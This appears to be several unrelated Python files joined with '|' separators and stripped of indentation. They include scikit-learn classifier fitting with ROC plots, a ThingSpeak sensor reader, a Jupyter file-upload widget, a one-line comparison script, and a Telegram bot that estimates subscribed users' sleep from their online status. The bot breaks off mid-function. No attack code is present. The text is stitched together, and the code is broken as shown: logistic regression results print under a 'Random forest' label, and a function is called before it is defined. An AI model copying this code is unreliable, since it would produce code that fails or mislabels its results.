print 'SVM .score: {}'.format(model.score(self.x_train,self.y_train))
svm_predicted = model.predict(self.x_test)
svm_predicted_prob = model.predict_proba(self.x_test)
print 'SMV precision: {}\n'.format(precision_score(self.y_test,
svm_predicted))
print 'SMV recall: {}\n'.format(recall_score(self.y_test,
svm_predicted))
print 'SMV f1_score: {}\n'.format(f1_score(self.y_test,
svm_predicted))
self.make_roc_plot(self.y_test, svm_predicted_prob, self.data_name,
'SVM')
class_table_svm = classification_table(self.y_test, svm_predicted)
filename = 'smv_class_table_{}'.format(self.data_name)
with open(filename, 'w') as f:
f.write(class_table_svm)
def run_rf(self):
rf = RandomForestClassifier(max_depth=None, min_samples_split=1,
random_state=0)
rf_parameters = {'n_estimators':[100,250,500,750,1000]}
rf_grid = grid_search.GridSearchCV(rf, rf_parameters)
print 'Fitting model...'
rf_grid.fit(self.x_train,self.y_train)
print '\nRandom Forest best estimator: {}\n'.format(rf_grid.best_estimator_)
print 'Random Forest gridsearchCV scores: {}\n'.format(rf_grid.grid_scores_)
rf_predicted_prob = rf_grid.predict_proba(self.x_test)
rf_predicted = rf_grid.predict(self.x_test)
print 'Random forest precision: {}\n'.format(precision_score(self.y_test,
rf_predicted))
print 'Random forest recall: {}\n'.format(recall_score(self.y_test,
rf_predicted))
print 'Random forest f1_score: {}\n'.format(f1_score(self.y_test,
rf_predicted))
self.make_roc_plot(self.y_test, rf_predicted_prob, self.data_name,
'Random Forest')
class_table_rf = classification_table(self.y_test, rf_predicted)
filename = 'rf_class_table_{}'.format(self.data_name)
with open(filename, 'w') as f:
f.write(class_table_rf)
def run_logit(self):
lr = LogisticRegression()
lr_parameters = {'penalty':['l1', 'l2'],
'C': [2**-4, 2**-3, 2**-2, 2**-1, 2**0,
2**1, 2**2, 2**3, 2**4],
'class_weight':['auto', None]}
lr_grid = grid_search.GridSearchCV(lr, lr_parameters)
print 'Fitting model...'
lr_grid.fit(self.x_train,self.y_train)
print '\nLogistic Regression best estimator: {}\n'.format(lr_grid.best_estimator_)
print 'Logistic Regression gridsearchCV scores: {}\n'.format(lr_grid.grid_scores_)
lr_predicted_prob = lr_grid.predict_proba(self.x_test)
lr_predicted = lr_grid.predict(self.x_test)
print 'Random forest precision: {}\n'.format(precision_score(self.y_test,
lr_predicted))
print 'Random forest recall: {}\n'.format(recall_score(self.y_test,
lr_predicted))
print 'Random forest f1_score: {}\n'.format(f1_score(self.y_test,
lr_predicted))
self.make_roc_plot(self.y_test, lr_predicted_prob, self.data_name,
'Logistic Regression')
class_table_lr = classification_table(self.y_test, lr_predicted)
filename = 'lr_class_table_{}'.format(self.data_name)
with open(filename, 'w') as f:
f.write(class_table_lr)
def run_gbt(self):
bdt = AdaBoostClassifier(DecisionTreeClassifier())
bdt_parameters = {'algorithm':('SAMME', 'SAMME.R'),
'n_estimators':[100,250,500,750,1000]}
bdt_grid = grid_search.GridSearchCV(bdt, bdt_parameters)
print 'Fitting model...'
bdt_grid.fit(self.x_train,self.y_train)
print 'AdaBoost best estimator: {}\n'.format(bdt_grid.best_estimator_)
print 'AdaBoost gridsearchCV scores: {}\n'.format(bdt_grid.grid_scores_)
bdt_predicted_prob = bdt_grid.predict_proba(self.x_test)
bdt_predicted = bdt_grid.predict(self.x_test)
print 'AdaBoost precision: {}\n'.format(precision_score(self.y_test,
bdt_predicted))
print 'AdaBoost recall: {}\n'.format(recall_score(self.y_test,
bdt_predicted))
print 'AdaBoost f1_score: {}\n'.format(f1_score(self.y_test,
bdt_predicted))
self.make_roc_plot(self.y_test, bdt_predicted_prob, self.data_name,
'AdaBoost')
class_table_boost = classification_table(self.y_test, bdt_predicted)
with open('adaboost_class_table.txt', 'w') as f:
f.write(class_table_boost)
def run_all(self):
print '='*15 + '\n'
print 'Running for data: {}\n'.format(self.data_name)
print '='*15 + '\n\n'
print 'Running RF\n\n'
self.run_rf()
print 'Running GBT\n\n'
self.run_gbt()
print 'Running Logit\n\n'
self.run_logit()
print 'Running SVM\n\n'
self.run_svm()
print '='*15 + '\n'
def make_roc_plot(self, test_data, predicted_probs, data_name, model_name):
"""
Function to generate ROC plots.
Inputs
------
test_data : y_test data from the train-test splits.
eoi : The event of interest under examination.
Output
------
Saves the ROC plot to a file with the EOI in the name.
"""
fpr, tpr, thresholds = roc_curve(test_data, predicted_probs[:, 1])
roc_auc = auc(fpr, tpr)
print 'AUC is {}'.format(roc_auc)
figname = 'roc_plot_{}_{}'.format(data_name, model_name)
title = 'ROC Curve - {} - {}'.format(data_name, model_name)
pl.clf()
pl.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % roc_auc)
pl.plot([0, 1], [0, 1], 'k--')
pl.xlim([0.0, 1.0])
pl.ylim([0.0, 1.0])
pl.xlabel('False Positive Rate')
pl.ylabel('True Positive Rate')
pl.title(title)
pl.legend(loc="lower right")
pl.savefig(figname, bbox_inches=0)
if __name__ == '__main__':
import numpy as np
x_train = np.genfromtxt('./x_train.csv', delimiter=',')
x_test = np.genfromtxt('./x_test.csv', delimiter=',')
x_train = preprocessing.scale(x_train)
x_test = preprocessing.scale(x_test)
y_train = np.genfromtxt('./y_train.csv', delimiter=',')
y_test = np.genfromtxt('./y_test.csv', delimiter=',')
proc = FitModels(x_train, x_test, y_train, y_test, 'Prediction')
proc.run_svm()
#proc.run_all()
clf = svm.SVC(C=2, cache_size=200, class_weight='auto', coef0=0.0, degree=3,
gamma=0, kernel='rbf', max_iter=-1, probability=True,
random_state=None, shrinking=True, tol=0.001, verbose=False)
clf.fit(x_train, y_train)
svm_predicted = clf.predict(x_test)
svm_predicted_prob = clf.predict_proba(x_test)
print 'SMV precision: {}\n'.format(precision_score(y_test,
svm_predicted))
print 'SMV recall: {}\n'.format(recall_score(y_test, svm_predicted))
print 'SMV f1_score: {}\n'.format(f1_score(y_test, svm_predicted))
make_roc_plot(y_test, svm_predicted_prob, 'Prediction', 'SVM')
class_table_svm = classification_table(y_test, svm_predicted)
filename = 'smv_class_table_{}'.format('Prediction')
with open(filename, 'w') as f:
f.write(class_table_svm)
def make_roc_plot(test_data, predicted_probs, data_name, model_name):
"""
Function to generate ROC plots.
Inputs
------
test_data : y_test data from the train-test splits.
eoi : The event of interest under examination.
Output
------
Saves the ROC plot to a file with the EOI in the name.
"""
fpr, tpr, thresholds = roc_curve(test_data, predicted_probs[:, 1])
roc_auc = auc(fpr, tpr)
print 'AUC is {}'.format(roc_auc)
figname = 'roc_plot_{}_{}'.format(data_name, model_name)
title = 'ROC Curve - {} - {}'.format(data_name, model_name)
pl.clf()
pl.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % roc_auc)
pl.plot([0, 1], [0, 1], 'k--')
pl.xlim([0.0, 1.0])
pl.ylim([0.0, 1.0])
pl.xlabel('False Positive Rate')
pl.ylabel('True Positive Rate')
pl.title(title)
pl.legend(loc="lower right")
pl.savefig(figname, bbox_inches=0)
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#from .coco import COCODataset
#from .voc import PascalVOCDataset
from .concat_dataset import ConcatDataset
from .giro import giro
__all__ = ["giro","ConcatDataset"] # "COCODataset", "ConcatDataset", "PascalVOCDataset",
|
import requests
from time import time, sleep
class ThingSpeakService:
def __init__(self, channel, api_key):
self.url = 'https://api.thingspeak.com/channels/'
self.channel = channel
self.api_key = api_key
self.co2_field = 'field1'
self.temp_field = 'field2'
self.hum_field = 'field3'
self.read_delay = 10
self.last_read_time = 0
self.last_reading = ""
def get_readings_json(self, nr_readings):
current_time = time()
if current_time - self.last_read_time > self.read_delay:
try:
self.last_read_time = current_time
req = self.url + str(self.channel) + '/feeds.json?api_key=' + self.api_key + '&results=' + str(nr_readings)
response = requests.get(req)
if response.status_code == 200:
self.last_reading = response.json()
return response.json()
else:
return self.last_reading
except:
return self.last_reading
else:
return self.last_reading
def get_field(self, field_name, num_readings):
json = self.get_readings_json(num_readings)
feeds = json.get('feeds')
if num_readings == 1:
return feeds[0].get(field_name)
else:
readings = []
for i in range(num_readings):
readings.append(feeds[i].get(field_name))
return readings
def get_co2(self, nr=1):
value = self.get_field(self.co2_field, nr)
return 0 if value is None else int(value)
def get_temp(self, nr=1):
value = self.get_field(self.temp_field, nr)
return 0 if value is None else float(value)
def get_hum(self, nr=1):
value = self.get_field(self.hum_field, nr)
return 0 if value is None else float(value) |
# Copyright(c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
"""FileUpload class.
Represents a file upload button.
"""
from traitlets import (
observe, default, Unicode, Dict, List, Int, Bool, Bytes, CaselessStrEnum
)
from .widget_description import DescriptionWidget
from .valuewidget import ValueWidget
from .widget_core import CoreWidget
from .widget_button import ButtonStyle
from .widget import register, widget_serialization
from .trait_types import InstanceDict
@register
class FileUpload(DescriptionWidget, ValueWidget, CoreWidget):
"""
Upload file(s) from browser to Python kernel as bytes
"""
_model_name = Unicode('FileUploadModel').tag(sync=True)
_view_name = Unicode('FileUploadView').tag(sync=True)
accept = Unicode(help='File types to accept, empty string for all').tag(sync=True)
multiple = Bool(help='If True, allow for multiple files upload').tag(sync=True)
disabled = Bool(help='Enable or disable button').tag(sync=True)
icon = Unicode('upload', help="Font-awesome icon name, without the 'fa-' prefix.").tag(sync=True)
button_style = CaselessStrEnum(
values=['primary', 'success', 'info', 'warning', 'danger', ''], default_value='',
help="""Use a predefined styling for the button.""").tag(sync=True)
style = InstanceDict(ButtonStyle).tag(sync=True, **widget_serialization)
error = Unicode(help='Error message').tag(sync=True)
value = List(Dict(), help="The file upload value").tag(sync=True)
@default('description')
def _default_description(self):
return 'Upload'
|
def main(n, m):
print('Yes' if n == m else 'No')
if __name__ == '__main__':
params = input()
params = params.split()
n = int(params[0])
m = int(params[1])
main(n, m)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Trusted Sleep Monitor Bot
This bot monitors group members' sleep time using online status.
Threads:
* tg-cli
* Event: set online state
* Telegram API polling
* /status - List sleeping status
* /average - List statistics about sleep time
* /help - About the bot
* /start - Describe how to use
* /settz - Set user timezone
* /subscribe - Add user to watchlist
* /unsubscribe - Remove user from watchlist
* Main
* SQLite
* Member
* Basic info
* Subscribed?
* Timezone
* Sleep start/end events
'''
import os
import re
import sys
import math
import time
import json
import queue
import signal
import sqlite3
import logging
import gettext
import datetime
import requests
import operator
import functools
import itertools
import threading
import collections
import concurrent.futures
import pytz
import tgcli
import humanizetime
re_zoneloc = re.compile(r'([+-]\d{4,7})([+-]\d{4,7})')
logging.basicConfig(stream=sys.stderr, format='%(asctime)s [%(name)s:%(levelname)s] %(message)s', level=logging.DEBUG if sys.argv[-1] == '-v' else logging.INFO)
logger_botapi = logging.getLogger('botapi')
executor = concurrent.futures.ThreadPoolExecutor(5)
HSession = requests.Session()
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
# Cli bot
tg_mktime = lambda s: time.mktime(time.strptime(s, '%Y-%m-%d %H:%M:%S'))
def handle_tg_update(obj):
try:
if obj.get('event') in ('message', 'service'):
#update_user(obj['from'])
user_event(obj['from'], obj['date'])
if 'when' in obj['from']:
user_event(obj['from'], tg_mktime(obj['from']['when']))
elif obj.get('event') == 'online-status':
#update_user(obj['user'])
try:
# it's localtime
user_event(obj['user'], tg_mktime(obj['when']))
except ValueError:
pass
except Exception:
logging.exception("can't handle message event")
def tg_get_members(chat):
chattype = chat.get('type')
# To ensure the id is valid
TGCLI.cmd_dialog_list()
if chattype == 'group':
peername = 'chat#id%d' % (-chat['id'])
obj = TGCLI.cmd_chat_info(peername)
return obj['members']
elif chattype == 'supergroup':
peername = 'channel#id%d' % (-chat['id'] - 1000000000000)
members = items = TGCLI.cmd_channel_get_members(peername, 100)
dcount = 100
while items:
items = TGCLI.cmd_channel_get_members(peername, 100, dcount)
members.extend(items)
dcount += 100
return members
else:
return
# API bot
class BotAPIFailed(Exception):
pass
def async_func(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
def func_noerr(*args, **kwargs):
try:
func(*args, **kwargs)
except Exception:
logger_botapi.exception('Async function failed.')
executor.submit(func_noerr, *args, **kwargs)
return wrapped
def bot_api(method, **params):
for att in range(3):
try:
req = HSession.get(('https://api.telegram.org/bot%s/' %
CFG.apitoken) + method, params=params, timeout=45)
retjson = req.content
ret = json.loads(retjson.decode('utf-8'))
break
except Exception as ex:
if att < 1:
time.sleep((att + 1) * 2)
else:
raise ex
if not ret['ok']:
raise BotAPIFailed(repr(ret))
return ret['result']
@async_func
def sendmsg(text, chat_id, reply_to_message_id=None):
text = text.strip()
if not text:
logger_botapi.warning('Empty message ignored: %s, %s' % (chat_id, reply_to_message_id))
return
logger_botapi.info('sendMessage(%s): %s' % (len(text), text[:20]))
if len(text) > 2000:
text = text[:1999] + '…'
reply_id = reply_to_message_id
if reply_to_message_id and reply_to_message_id < 0:
reply_id = None
return bot_api('sendMessage', chat_id=chat_id, text=text, reply_to_message_id=reply_id)
def updatebotinfo():
global CFG
d = bot_api('getMe')
CFG['username'] = d.get('username')
CFG['nickname'] = d.get('first_name')
def getupdates():
global CFG
while 1:
try:
updates = bot_api('getUpdates', offset=CFG['offset'], timeout=10)
except Exception:
logger_botapi.exception('Get updates failed.')
continue
if updates:
logger_botapi.debug('Messages coming.')
CFG['offset'] = updates[-1]["update_id"] + 1
for upd in updates:
MSG_Q.put(upd)
time.sleep(.2)
def parse_cmd(text: str):
t = text.strip().replace('\xa0', ' ').split(' ', 1)
if not t:
return (None, None)
cmd = t[0].rsplit('@', 1)
if len(cmd[0]) < 2 or cmd[0][0] != "/":
return (None, None)
if len(cmd) > 1 and 'username' in CFG and cmd[-1] != CFG['username']:
return (None, None)
expr = t[1] if len(t) > 1 else ''
return (cmd[0][1:], expr.strip())
def handle_api_update(d):
logger_botapi.debug('Msg arrived: %r' % d)
if 'message' in d:
try:
msg = d['message']
update_user(msg['from'])
user_event(msg['from'], msg['date'])
cmd, expr = parse_cmd(msg.get('text', ''))
if cmd in COMMANDS:
logger_botapi.info('Command: /%s %s' % (cmd, expr))
COMMANDS[cmd](expr, msg['chat']['id'], msg['message_id'], msg)
elif msg['chat']['type'] == 'private':
sendmsg(_('Invalid command. Send /help for help.'), msg['chat']['id'], msg['message_id'])
else:
update_user_group(msg['from'], msg['chat'])
except Exception:
logger_botapi.exception('Failed to process a message.')
# Processing
class _TimezoneLocationDict(pytz.LazyDict):
"""Map timezone to its principal location."""
def __getitem__(self, key):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return self.data[key]
def _convert_coordinates(self, match):
lat_text, lon_text = match.groups()
if len(lat_text) < 7:
lat = int(lat_text[:-2]) + int(lat_text[-2:]) / 60
else:
lat = int(lat_text[:-4]) + int(lat_text[-4:-2]) / 60 + int(lat_text[-2:]) / 3600
if len(lon_text) < 7:
lon = int(lon_text[:-2]) + int(lon_text[-2:]) / 60
else:
lon = int(lon_text[:-4]) + int(lon_text[-4:-2]) / 60 + int(lon_text[-2:]) / 3600
return (lat, lon)
def _fill(self):
data = {}
zone_tab = pytz.open_resource('zone.tab')
try:
for line in zone_tab:
line = line.decode('UTF-8')
if line.startswith('#'):
continue
code, coordinates, zone = line.split(None, 4)[:3]
match = re_zoneloc.match(coordinates)
if match:
data[zone] = self._convert_coordinates(match)
self.data = data
finally:
zone_tab.close()
timezone_location = _TimezoneLocationDict()
def init_db():
global DB, CONN
DB = sqlite3.connect(CFG['database'])
DB.row_factory = sqlite3.Row
CONN = DB.cursor()
CONN.execute('CREATE TABLE IF NOT EXISTS users ('
'id INTEGER PRIMARY KEY,' # peer_id
'username TEXT,'
'first_name TEXT,'
'last_name TEXT,'
'subscribed INTEGER,'
'timezone TEXT'
')')
CONN.execute('CREATE TABLE IF NOT EXISTS user_chats ('
'user INTEGER,'
'chat INTEGER,'
'PRIMARY KEY (user, chat),'
'FOREIGN KEY (user) REFERENCES users(id)'
')')
CONN.execute('CREATE TABLE IF NOT EXISTS events ('
'user INTEGER,'
'time INTEGER,'
'PRIMARY KEY (user, time),'
'FOREIGN KEY (user) REFERENCES users(id)'
')')
CONN.execute('CREATE TABLE IF NOT EXISTS sleep ('
'user INTEGER,'
'time INTEGER,'
'duration INTEGER,'
'PRIMARY KEY (user, time),'
'FOREIGN KEY (user) REFERENCES users(id)'
')')
users = {}
for row in CONN.execute('SELECT * FROM users'):
users[row['id']] = dict(row)
return users
def update_user_group(user, chat):
if chat['type'].endswith('group'):
uid = user.get('peer_id') or user['id']
CONN.execute('INSERT OR IGNORE INTO user_chats (user, chat) VALUES (?, ?)', (uid, chat['id']))
def update_user(user, subscribed=None, timezone=None):
uid = user.get('peer_id') or user['id']
if uid in USER_CACHE:
updkey = ''
updval = [user.get('username') or None, user.get('first_name', ''),
user.get('last_name')]
USER_CACHE[uid]['username'] = updval[0]
USER_CACHE[uid]['first_name'] = updval[1]
USER_CACHE[uid]['last_name'] = updval[2]
if subscribed is not None:
updkey += ', subscribed=?'
updval.append(subscribed)
USER_CACHE[uid]['subscribed'] = subscribed
if timezone:
updkey += ', timezone=?'
updval.append(timezone)
USER_CACHE[uid]['timezone'] = timezone
updval.append(uid)
CONN.execute('UPDATE users SET username=?, first_name=?, last_name=?%s WHERE id=?' % updkey, updval)
else:
USER_CACHE[uid] = user
timezone = USER_CACHE[uid]['timezone'] = timezone or CFG['defaulttz']
subscribed = USER_CACHE[uid]['subscribed'] = subscribed or 0
CONN.execute('REPLACE INTO users VALUES (?,?,?,?,?,?)',
(uid, user.get('username') or None, user.get('first_name', ''),
user.get('last_name'), subscribed, timezone))
def user_event(user, eventtime):
uid = user.get('peer_id') or user['id']
if uid in USER_CACHE and USER_CACHE[uid]['subscribed']:
# https://github.com/vysheng/tg/wiki/Scripting-notes
# > To check whether a user is online, update the contact list and
# > compare user_status["when"] with the current time. If the status
# > is in the future, the contact is online right now.
now = int(time.time())
if eventtime > now:
eventtime = now
CONN.execute('INSERT OR IGNORE INTO events (user, time) VALUES (?, ?)', (uid, eventtime))
def user_last_seen(user):
uid = user.get('peer_id') or user['id']
if uid in USER_CACHE and USER_CACHE[uid]['subscribed']:
res = CONN.execute('SELECT time FROM events WHERE '
'user = ? ORDER BY time DESC LIMIT 1', (uid,)).fetchone()
if res:
return res[0]
def hour_minutes(seconds, zpad=True):
m = round(seconds / 60)
h, m = divmod(m, 60)
if zpad:
return '%02d:%02d' % (h, m)
else:
return '%d:%02d' % (h, m)
def replace_dt_time(fromdatetime, seconds):
tz = fromdatetime.tzinfo
return tz.normalize(datetime.datetime.combine(fromdatetime,
datetime.time(tzinfo=tz)) + datetime.timedelta(seconds=seconds))
def replace_dt_hours(fromdatetime, hours):
tz = fromdatetime.tzinfo
return tz.normalize(datetime.datetime.combine(fromdatetime,
datetime.time(tzinfo=tz)) + datetime.timedelta(hours=hours))
def midnight_delta(fromdatetime, adjust=True):
fromtimestamp = fromdatetime.timestamp()
midnight = datetime.datetime.combine(fromdatetime,
datetime.time(tzinfo=fromdatetime.tzinfo)).timestamp()
delta = fromtimestamp - midnight
if adjust and delta > 43200:
return delta - 86400
else:
return delta
midnight_adjust = lambda delta: delta + 86400 if delta < 0 else delta
def tz_is_day(dt, tzname, lat=None, lon=None):
timezone = dt.tzinfo
offset = timezone.utcoffset(dt).total_seconds() / 240
clocktime = midnight_delta(dt, False) / 3600
if lat is None:
if tzname in timezone_location:
lat, lon = timezone_location[tzname]
elif 6 <= clocktime < 18:
return True
else:
return False
localtime = (clocktime + (lon-offset) / 15 + 24) % 24
a = 2 * math.pi * (dt.timetuple().tm_yday + localtime / 24) / 365
phi = 0.006918 - 0.399912 * math.cos(a) + 0.070257*math.sin(a) - \
0.006758 * math.cos(2*a) + 0.000907 * math.sin(2*a) - \
0.002697 * math.cos(3*a) + 0.001480 * math.sin(3*a)
latrad = math.radians(lat)
h0 = math.asin(math.cos(math.radians((localtime - 12) * 15)) *
math.cos(latrad) * math.cos(phi) + math.sin(latrad) * math.sin(phi))
return (h0 > 0)
def user_status(uid, events):
'''
Identify sleep time using rules as follows:
-24h 0 6 now
/=====================\ <- SELECT
. x-+-----------+----💤?
. | x-----+----💤?
. | | x 🌞?
. x-+--------x x| xx
. x-+-----------+--x
. xx| x------x x| xx
. | x x-------+-x
. x | x------+--x
. x | x-------x | 🌞?
x . | | 🌞?
. x | | x 🌞?
Legend:
x user event
. select boundary (last 24h)
- sleep duration
| cut window (0:00 ~ 6:00 local time)
💤 maybe sleeping
🌞 maybe awake
'''
start, interval = None, None
usertime = datetime.datetime.now(pytz.timezone(USER_CACHE[uid]['timezone']))
window = (replace_dt_time(usertime, CFG['cutwindow'][0]).timestamp(),
replace_dt_time(usertime, CFG['cutwindow'][1]).timestamp())
lasttime = None
left, right = None, None
complete = True
intervals = []
for _user, etime in events:
if lasttime:
intervals.append((etime - lasttime, lasttime))
lasttime = etime
if etime > window[1]:
right = etime
break
elif etime > window[1]:
if left:
intervals.append((etime - left, left))
lasttime = right = etime
break
elif etime < window[0]:
left = etime
elif left:
intervals.append((etime - left, left))
lasttime = etime
if etime > window[1]:
right = etime
break
else:
lasttime = etime
if intervals:
complete = right is not None
interval, start = max(intervals)
if interval > CFG['threshold']:
# offline for too long
start = interval = None
elif lasttime:
start = lasttime
elif left:
start = left
# else: pass
if interval is None and start and usertime.timestamp() - start > CFG['threshold']:
# also offline for too long
start = None
return start, interval, complete
def user_status_update(uid):
expires = time.time() - 86400
start, interval, complete = user_status(uid, CONN.execute(
'SELECT events.user, events.time FROM events'
' INNER JOIN users ON events.user = users.id'
' WHERE events.user = ? AND events.time >= ?'
' AND users.subscribed = 1'
' ORDER BY events.user ASC, events.time ASC', (uid, expires)))
if start and interval and complete:
CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
(uid, start, interval))
return start, interval, complete
def group_status_update(chat):
expires = time.time() - 86400
uid = chat['id']
stats = []
for user, group in itertools.groupby(tuple(CONN.execute(
'SELECT events.user, events.time FROM events'
' INNER JOIN users ON events.user = users.id'
' INNER JOIN user_chats ON events.user = user_chats.user'
' WHERE user_chats.chat = ? AND events.time >= ?'
' AND users.subscribed = 1'
' ORDER BY events.user ASC, events.time ASC', (uid, expires))),
key=operator.itemgetter(0)):
start, interval, complete = user_status(user, group)
stats.append((user, start, interval))
if start and interval and complete:
CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
(user, start, interval))
stats.sort(key=lambda x: (-x[2] if x[2] else 0, x[1] or float('inf'), x[0]))
return stats
def all_status_update():
expires = time.time() - 86400
stats = []
for user, group in itertools.groupby(tuple(CONN.execute(
'SELECT events.user, events.time FROM events'
' INNER JOIN users ON events.user = users.id'
' WHERE events.time >= ? AND users.subscribed = 1'
' ORDER BY events.user ASC, events.time ASC', (expires,))),
key=operator.itemgetter(0)):
start, interval, complete = user_status(user, group)
stats.append((user, start, interval))
if start and interval and complete:
CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
(user, start, interval))
CONN.execute('DELETE FROM events WHERE time < ?', (expires,))
CONN.execute('DELETE FROM sleep WHERE duration > ?', (CFG['threshold'],))
return stats
def update_group_members(chat):
members = None
try:
members = tg_get_members(chat)
except Exception:
pass
if members:
for m in members:
update_user_group(m, chat)
if 'when' in m:
user_event(m, tg_mktime(m['when']))
@functools.lru_cache(maxsize=100)
def db_getuidbyname(username):
if username.startswith('#'):
try:
return int(username[1:])
except ValueError:
return None
else:
uid = CONN.execute('SELECT id FROM users WHERE username LIKE ?', (username,)).fetchone()
if uid:
return uid[0]
def cmd_status(expr, chatid, replyid, msg):
'''/status [all|@username] - List sleeping status'''
if expr and expr[0] == '@':
uid = db_getuidbyname(expr[1:])
if not uid:
sendmsg(_('User not found.'), chatid, replyid)
return
elif 'reply_to_message' in msg:
uid = msg['reply_to_message']['from']['id']
elif expr == 'all' and chatid < 0:
uid = None
else:
uid = msg['from']['id']
if uid not in USER_CACHE:
sendmsg(_('Please first /subscribe.'), chatid, replyid)
return
if uid:
usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
usertime = datetime.datetime.now(usertz)
lastseen = user_last_seen(USER_CACHE[uid])
if lastseen:
userseendelta = usertime - datetime.datetime.fromtimestamp(
lastseen, usertz)
else:
userseendelta = None
text = [_('%s: local time is %s (%s)') % (
getufname(USER_CACHE[uid]), usertime.strftime('%H:%M'),
USER_CACHE[uid]['timezone'])]
if USER_CACHE[uid]['subscribed']:
start, interval, complete = user_status_update(uid)
if uid != msg['from']['id'] and userseendelta:
ndelta = humanizetime.naturaldelta(userseendelta)
if ndelta in (_("a moment"), _("now")):
text.append(_('Online'))
else:
text.append(_('Last seen: %s ago') % ndelta)
cutstart, cutend = CFG['cutwindow']
cutmid = (cutstart + cutend) / 2
if start:
userstart = datetime.datetime.fromtimestamp(start, usertz)
if interval:
end = userstart + datetime.timedelta(seconds=interval)
# 0 3 6
# +===========+
# | ---+-----+--x
# ^start ^end ^now
# sure
# | ----+---x |
# ^start ^end+now
# we are not sure, so don't write the db
if interval and (complete or midnight_delta(end) > cutmid):
text.append(_('Last sleep: %s, %s→%s') % (
hour_minutes(interval, False),
userstart.strftime('%H:%M'), end.strftime('%H:%M')))
# | | | and is current user
# ^now
elif (uid == msg['from']['id'] and
cutstart < midnight_delta(usertime) < cutmid):
text.append(_('Go to sleep!'))
# | x | |
# ^start ^now
# ^s ^now
else:
text.append(_('Sleep: %s→💤') % userstart.strftime('%H:%M'))
else:
text.append(_('Not enough data.'))
else:
text.append(_('Not subscribed.'))
sendmsg('\n'.join(text), chatid, replyid)
else:
update_group_members(msg['chat'])
text = []
startsum = intrvsum = 0
validstartcount = validintervcount = 0
for uid, start, interval in group_status_update(msg['chat']):
if not start:
continue
dispname = getufname(USER_CACHE[uid])
usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
userstart = datetime.datetime.fromtimestamp(start, usertz)
startsum += midnight_delta(userstart)
validstartcount += 1
if interval:
end = userstart + datetime.timedelta(seconds=interval)
text.append('%s: %s, %s→%s' % (dispname,
hour_minutes(interval, False),
userstart.strftime('%H:%M'), end.strftime('%H:%M')))
intrvsum += interval
validintervcount += 1
else:
text.append('%s: %s→💤' % (dispname, userstart.strftime('%H:%M')))
if validintervcount:
avgstart = startsum/validstartcount
avginterval = intrvsum/validintervcount
text.append(_('Average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
sendmsg('\n'.join(text) or _('Not enough data.'), chatid, replyid)
def user_average_sleep(usertz, iterable):
startsum = intrvsum = 0
count = 0
for start, duration in iterable:
userstart = datetime.datetime.fromtimestamp(start, usertz)
startsum += midnight_delta(userstart)
intrvsum += duration
count += 1
if count:
avgstart = startsum/count
avginterval = intrvsum/count
return (avgstart, avginterval)
else:
return (None, None)
def group_average_sleep(uid=None, fulllist=False):
_self_cache = group_average_sleep.cache
_cache_ttl = 600
if fulllist:
stats = []
else:
try:
timestamp, avgstart, avginterval = _self_cache[uid]
if time.time() - timestamp < _cache_ttl:
return avgstart, avginterval
except KeyError:
pass
startsum = intrvsum = 0
count = 0
if uid:
result = CONN.execute(
'SELECT sleep.user, sleep.time, sleep.duration FROM sleep'
' INNER JOIN users ON sleep.user = users.id'
' INNER JOIN user_chats ON sleep.user = user_chats.user'
' WHERE user_chats.chat = ? AND users.subscribed = 1'
' ORDER BY sleep.user', (uid,))
else:
result = CONN.execute(
'SELECT sleep.user, sleep.time, sleep.duration FROM sleep'
' INNER JOIN users ON sleep.user = users.id'
' WHERE users.subscribed = 1 ORDER BY sleep.user')
for user, group in itertools.groupby(result, key=operator.itemgetter(0)):
usertz = pytz.timezone(USER_CACHE[user]['timezone'])
avgstart, avginterval = user_average_sleep(usertz,
map(operator.itemgetter(1, 2), group))
if fulllist:
stats.append((avginterval, avgstart, getufname(USER_CACHE[user])))
count += 1
startsum += avgstart
intrvsum += avginterval
avgstart = avginterval = None
if count:
avgstart = startsum/count
avginterval = intrvsum/count
if fulllist:
return stats, avgstart, avginterval
else:
_self_cache[uid] = (time.time(), avgstart, avginterval)
return avgstart, avginterval
group_average_sleep.cache = {}
def cmd_average(expr, chatid, replyid, msg):
'''/average - List statistics about sleep time'''
if expr == 'all' and chatid < 0:
uid = None
else:
uid = msg['from']['id']
if uid not in USER_CACHE:
sendmsg(_('Please first /subscribe.'), chatid, replyid)
return
text = []
if uid:
usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
avgstart, avginterval = user_average_sleep(usertz, CONN.execute(
'SELECT time, duration FROM sleep WHERE user = ?', (uid,)))
if avgstart is not None:
text.append(_('Average: %s, %s→%s') % (hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
text.append(_('Not enough data.'))
if chatid > 0:
avgstart, avginterval = group_average_sleep(None)
if avgstart and avginterval:
text.append(_('Global average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
avgstart, avginterval = group_average_sleep(msg['chat']['id'])
if avgstart and avginterval:
text.append(_('Group average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
update_group_members(msg['chat'])
uid = msg['chat']['id']
stats, avgstart, avginterval = group_average_sleep(uid, True)
if stats:
stats.sort(key=lambda x: (-x[0], x[1], x[2]))
for interval, start, dispname in stats:
text.append('%s: %s, %s→%s' % (dispname,
hour_minutes(interval, False),
hour_minutes(midnight_adjust(start)),
hour_minutes(midnight_adjust(start + interval))))
